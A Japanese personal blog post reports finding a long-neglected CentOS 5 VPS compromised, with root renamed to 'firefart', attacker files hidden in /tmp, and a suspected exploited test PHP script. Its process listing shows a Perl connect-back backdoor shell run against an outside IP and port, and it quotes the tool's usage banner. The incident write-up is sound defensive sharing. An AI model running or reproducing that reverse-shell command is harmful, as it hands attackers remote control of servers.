zuntan02のはてなブログ

備忘録的なものです

さくらのVPSで長らく放置していたCentOS5環境が乗っ取られていた

【経緯】

練習用に配布していたVPSの環境を整理しようとしてログインしてsu - したら

su: user root does not exist

といわれる。

プロセスを確認すると、rootがfirefartというユーザにリネームされているような状態。

s aux
USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
firefart     1  0.0  0.0  10372   688 ?        Ss    2015   0:12 init [3]
firefart     2  0.0  0.0      0     0 ?        S<    2015   0:29 [migration/0]
firefart     3  0.0  0.0      0     0 ?        SN    2015   0:00 [ksoftirqd/0]
firefart     4  0.0  0.0      0     0 ?        S<    2015   0:00 [watchdog/0]
firefart     5  0.0  0.0      0     0 ?        S<    2015   0:15 [migration/1]
firefart     6  0.0  0.0      0     0 ?        SN    2015   0:00 [ksoftirqd/1]
firefart     7  0.0  0.0      0     0 ?        S<    2015   0:01 [watchdog/1]
firefart     8  0.0  0.0      0     0 ?        S<    2015   3:48 [events/0]
firefart     9  0.0  0.0      0     0 ?        S<    2015   1:26 [events/1]
firefart    10  0.0  0.0      0     0 ?        S<    2015   0:08 [khelper]
firefart    19  0.0  0.0      0     0 ?        S<    2015   0:00 [kthread]
firefart    24  0.0  0.0      0     0 ?        S<    2015   0:01 [kblockd/0]
firefart    25  0.0  0.0      0     0 ?        S<    2015   0:00 [kblockd/1]
firefart    26  0.0  0.0      0     0 ?        S<    2015   0:00 [kacpid]
(省略)
nobody    4826  0.0  0.1  10820  1072 ?        S    Feb16   0:00 sh -c perl kl.txt 96.125.170.94 21 2>&1 3>&1
nobody    4827  0.0  0.4  33312  4344 ?        S    Feb16   0:00 perl kl.txt 96.125.170.94 21

このkl.txtというのが/tmpの下に置かれていて、

!/usr/bin/perl
use IO::Socket;
#Cold-z3ro  Connect Back Shell
#code by:Cold-z3ro www.4azhar.com c.o.1.d.0@hotmail.com
#
#
#Cold-z3ro@SlackwareLinux:/home/programing$ perl dc.pl
#--== ConnectBack Backdoor Shell vs 1.0 by Cold-z3ro ==--
#
#Usage: dc.pl [Host] [Port]
#
#Ex: dc.pl 127.0.0.1 2121
#Cold-z3ro@SlackwareLinux:/home/programing$ perl dc.pl 127.0.0.1 2121
#--== ConnectBack Backdoor Shell vs 1.0 by Cold-z3ro  ==--
#
#[*] Resolving HostName
#[*] Connecting... 127.0.0.1
#[*] Spawning Shell
#[*] Connected to remote host
(省略)

あー。なんかすみません。

他にも/tmpの下には怪しいファイルがてんこ盛り

drwxrwxrwt 72 firefart root       4096 Mar 23 14:24 .
drwxr-xr-x  2 nobody   nobody     4096 Mar 11 09:50 .
drwxr-xr-x 23 firefart root       4096 Sep  1  2015 ..
drwxr-xr-x  3 nobody   nobody     4096 Feb 23 09:22 .aaapasiddwww
drwxr-xr-x  3 nobody   nobody     4096 Mar  3 04:40 .aepsouasxxxwer
drwxr-xr-x  3 nobody   nobody     4096 Feb 12 03:41 .apxcusug
drwxr-xr-x  2 nobody   nobody     4096 Dec 24  2010 bb
-rw-r--r--  1 nobody   nobody   176245 Mar  3 05:58 bb.zip
drwxr-xr-x  3 nobody   nobody     4096 Feb 19 14:29 .cpdiueixxxx
drwxr-xr-x  3 nobody   nobody     4096 Feb 14 01:52 .dposuxxxx
drwxr-xr-x  3 nobody   nobody     4096 Mar  1 07:10 .eodsdfolqrqre
drwxr-xr-x  3 nobody   nobody     4096 Mar  1 00:41 .eodsxxweuee
drwxr-xr-x  3 nobody   nobody     4096 Feb 27 23:51 .eodusudxxx
drwxr-xr-x  3 nobody   nobody     4096 Feb 27 07:59 .eouuidffwe
drwxr-xr-x  3 nobody   nobody     4096 Mar  3 09:22 .epdosudffs
drwxr-xr-x  3 nobody   nobody     4096 Mar  3 09:58 .epfsudfqeqew
drwxr-xr-x  3 nobody   nobody     4096 Feb 23 00:15 .epqwiuxxllsdifu
-rw-r--r--  1 nobody   nobody  3331445 Mar 11 09:45 e.tgz
drwxr-xr-x  2 nobody   nobody     4096 Mar  7 08:06 etn
drwxr-xr-x  3 nobody   nobody     4096 Mar  3 07:22 .fsodgfudfisd
drwxr-xr-x  2 nobody   nobody     4096 Mar  1 10:20 .hahayysdfds
drwxrwxrwt  2 firefart root       4096 Aug 26  2015 .ICE-unix
drwxr-xr-x  3 nobody   nobody     4096 Feb 20 08:14 .ipqqqqiiewer
drwxr-xr-x  3 nobody   nobody     4096 Mar 14 02:24 .iuewyreuwtr
drwxr-xr-x  3 nobody   nobody     4096 Mar 14 00:46 .kaisoxaisqqq
-rw-r--r--  1 nobody   nobody     1995 Jan 28 18:22 kl.txt
-rw-r--r--  1 nobody   nobody     1995 Jan 28 18:22 kl.txt.1
drwxr-xr-x  3 nobody   nobody     4096 Mar 12 16:36 .losdiuqweqw
drwxr-xr-x  2 nobody   nobody     4096 Jan  1 00:01 min
-rw-r--r--  1 nobody   nobody  1307222 Feb 21 08:03 min.tgz
drwxr-xr-x  3 nobody   nobody     4096 Mar  1 06:14 .odsfyiwekrwe
drwxr-xr-x  3 nobody   nobody     4096 Feb 11 02:05 .oiieworqqw
drwxr-xr-x  3 nobody   nobody     4096 Mar 11 10:00 .osdfdsfogf
drwxr-xr-x  2 nobody   nobody     4096 Feb 19 13:43 .osdixxxqwee
drwxr-xr-x  3 nobody   nobody     4096 Mar 11 08:55 .p
drwxr-xr-x  3 nobody   nobody     4096 Feb 16 03:59 .paidufyxxx
drwxr-xr-x  3 nobody   nobody     4096 Feb 25 07:56 .pdidysucsdfsd
drwxr-xr-x  3 nobody   nobody     4096 Mar  9 22:21 .pdsifxxqytqtrwe
drwxr-xr-x  3 nobody   nobody     4096 Mar 14 03:57 .pefiuwewerowe
drwxr-xr-x  3 nobody   nobody     4096 Mar 12 17:10 .pfsiduqeqw
-rw-r--r--  1 nobody   nobody    41917 Mar  3 06:02 pico
drwxr-xr-x  3 nobody   nobody     4096 Feb 28 10:13 .pidsufsdoqr
drwxr-xr-x  3 nobody   nobody     4096 Feb 12 03:30 .ppoiwqerower
drwxr-xr-x  3 nobody   nobody     4096 Feb 22 04:16 .psadfiuxiiqwqr
drwxr-xr-x  3 nobody   nobody     4096 Feb 12 09:07 .psdfyyqwq
drwxr-xr-x  3 nobody   nobody     4096 Feb 26 22:57 .psiduasidxxx
-rw-r--r--  1 nobody   nobody 11865549 Mar 11 08:56 p.tgz
drwxr-xr-x  3 nobody   nobody     4096 Feb 27 01:43 .pwidisdxxsdg
drwxr-xr-x  3 nobody   nobody     4096 Feb 23 11:38 .pwiuifksdsf
drwxr-xr-x  3 nobody   nobody     4096 Mar  2 05:02 .qoisofgodg
drwxr-xr-x  2 nobody   nobody     4096 Mar 12 15:36 .radiasiasa
drwxr-xr-x  3 nobody   nobody     4096 Mar 13 14:30 .radicalspiasdf
drwxr-xr-x  3 nobody   nobody     4096 Mar 13 16:32 .raldoasopww
drwxr-xr-x  2 nobody   nobody     4096 Feb 21 08:07 .sdfgigdfgdfgdfgdf
drwxr-xr-x  3 nobody   nobody     4096 Feb 16 06:33 .sdfguiowrfdfdg
drwxr-xr-x  3 nobody   nobody     4096 Mar  1 10:05 .sdgfduguiwerew
drwxr-xr-x  3 nobody   nobody     4096 Feb 17 13:29 .sdifdsfxx
drwxr-xr-x  3 nobody   nobody     4096 Mar  1 11:27 .sdifuixwerwq
drwxr-xr-x  3 nobody   nobody     4096 Feb 11 01:36 .sdjfusdiqeq
drwxr-xr-x  2 nobody   nobody     4096 Feb 27 11:28 .sdkifusdf
drwxr-xr-x  3 nobody   nobody     4096 Mar 11 11:09 .sdofdfgqweqw
drwxr-xr-x  3 nobody   nobody     4096 Feb 17 13:27 .sdofiosrwrwq
drwxr-xr-x  3 nobody   nobody     4096 Feb 11 01:01 .sdufuqrerewr
drwxr-xr-x  3 nobody   nobody     4096 Feb 14 02:41 .sdywyuqxxxx
-rw-------  1 nobody   nobody      112 Mar 19 16:49 sess_bcdc55fec762cd39f63c998a5b3b56f3
-rw-------  1 nobody   nobody      112 Mar 23 14:47 sess_fab50cb89f14720c8e4d42555c4ce69b
drwxr-xr-x  3 nobody   nobody     4096 Mar  1 10:43 .sidgfuiwrw
drwxr-xr-x  3 nobody   nobody     4096 Mar  1 15:21 .spdofdsujxxxx
drwxr-xr-x  3 nobody   nobody     4096 Feb 23 01:24 .spoiaudxxx
drwxr-xr-x  2 nobody   nobody     4096 Feb 27 11:49 st
-rw-r--r--  1 nobody   nobody     7638 Feb 27 12:05 st.tgz
drwxr-xr-x  3 nobody   nobody     4096 Mar 12 15:37 .woefifudfweqe
drwxr-xr-x  3 nobody   nobody     4096 Feb 27 01:28 .wpdisdifdssx
drwxr-xr-x  3 nobody   nobody     4096 Feb 25 21:52 .wpowuydasudi
drwxrwxrwt  2 firefart root       4096 Aug 26  2015 .X11-unix
drwxr-xr-x  2 nobody   nobody     4096 Feb 16 10:03 xp
drwxr-xr-x  3 nobody   nobody     4096 Feb 19 14:13 .xpuitgdfsddsg
drwxr-xr-x  3 nobody   nobody     4096 Feb 12 13:10 .xpxisuiqwer
drwxr-xr-x  3 nobody   nobody     4096 Feb 23 02:33 .xxuyyyhqwreqwr
drwxr-xr-x  3 nobody   nobody     4096 Feb 20 01:37 .zcjsfuwrwe
drwxr-xr-x  3 nobody   nobody     4096 Feb 28 01:07 .zlucudfidskgsf
drwxr-xr-x  3 nobody   nobody     4096 Feb  9 23:13 .zpoxaiuwewe

【原因】

hosts.allowでsshの接続は締めていたが、このうえで動いていた(今となっては素性不明の)検証用PHPにいろいろとPOSTされており、乗っ取られたのかな……と想定

この環境は滅ぼしました